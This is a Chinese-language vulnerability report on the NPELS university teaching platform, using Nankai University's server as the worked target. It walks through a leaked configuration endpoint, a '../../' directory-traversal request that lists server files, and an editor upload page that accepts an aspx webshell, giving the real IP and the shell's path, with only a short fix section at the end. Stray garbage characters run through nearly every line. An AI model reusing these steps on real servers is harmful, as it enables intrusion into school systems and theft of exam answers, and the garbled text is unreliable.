好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中, W) @; A/ l6 \: }
6 k7 Z5 K) S' ~( A: D
详细说明:
- f; I0 p9 U) v2 y( m $ ]1 E. h1 A$ Q* b, D! N
以南开大学的为例:
' U8 v/ Q9 p4 c6 ^4 Ahttp://222.30.60.3/NPELS
p& @; P9 k# L# S/ r& wNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址8 v/ X/ l" {6 j+ N' D- V
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
4 \4 r) _! @! B: u' H<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
3 ^' _" k" c* }2 s6 G</setting>
# Y( g& ^" \" Z f: x: B5 h% Q及版本号% u4 r' ~% h4 k& L
<add key="TVersion" value="1, 0, 0, 2187">1 ?8 b, m9 O0 v
</add>, ~5 r4 ?4 c; O: r- P$ \6 _
直接访问, P& L; p$ ]2 @& V
http://222.30.60.3/NPELS/CommonService.asmx7 M3 a Q$ Q6 H a% X9 P5 a) o6 y
使用GetTestClientFileList操作,直接 HTTP GET 列目录:0 P; c z, [2 w! f0 h5 J/ T
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
|+ S5 Z% u4 k+ I. v$ h进一步列目录(返回的网页很大,可以直接 wget 下来)
& t7 ?/ D1 Y. a, Z7 yhttp://222.30.60.3/NPELS/CommonS ... List?version=../../
+ R# }8 y& T7 h& d ~# n
1 J- w8 V* G9 k3 i; \, H) u K发现
m5 D2 H3 x# K, phttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
D$ r* I: h ?7 w" A5 C可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头* e u6 B; S* g2 W
上传后继续列目录找到木马地址直接访问即可" X/ P3 ?! n8 m# ?
9 t2 f6 X$ \% C( Z. x& h2 y0 I
OOXX2 V8 @% P! Y: ]$ S+ y/ d: c
. q$ L$ }2 [. i2 \- @Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
9 A# v) J# u* }漏洞证明:
! T! a5 E" e; }* D- S4 H- o+ W
( U1 R- }) c- i5 t* H% w j2 c列目录:% }6 `1 d; m7 B& s/ G7 m
http://222.30.60.3/NPELS/CommonS ... List?version=../../4 a3 a- w" ?/ W5 {1 U7 _$ @7 h
文件上传:
% _4 K T/ I5 g* }# q- U" y0 {http://222.30.60.3/npelsv/editor/editor.htm
, K# M# W/ p2 `/ } 8 ^$ q4 F, |) x ^0 ]
上传木马:: y* |; O B9 c$ _+ d8 l1 f
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx5 O% U# Z2 V% ^% O" a9 T
1 D g4 n( t( v0 ?5 `
修复方案:
: R" ~! }; Z& j好像考试系统必须使用 CommonService.asmx) Z2 X# j5 g( H4 o
最好配置文件加密或者用别的方式不让它泄露出来
/ P8 n. c# j) J2 ~并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样
$ w7 s7 y! @3 ?- V |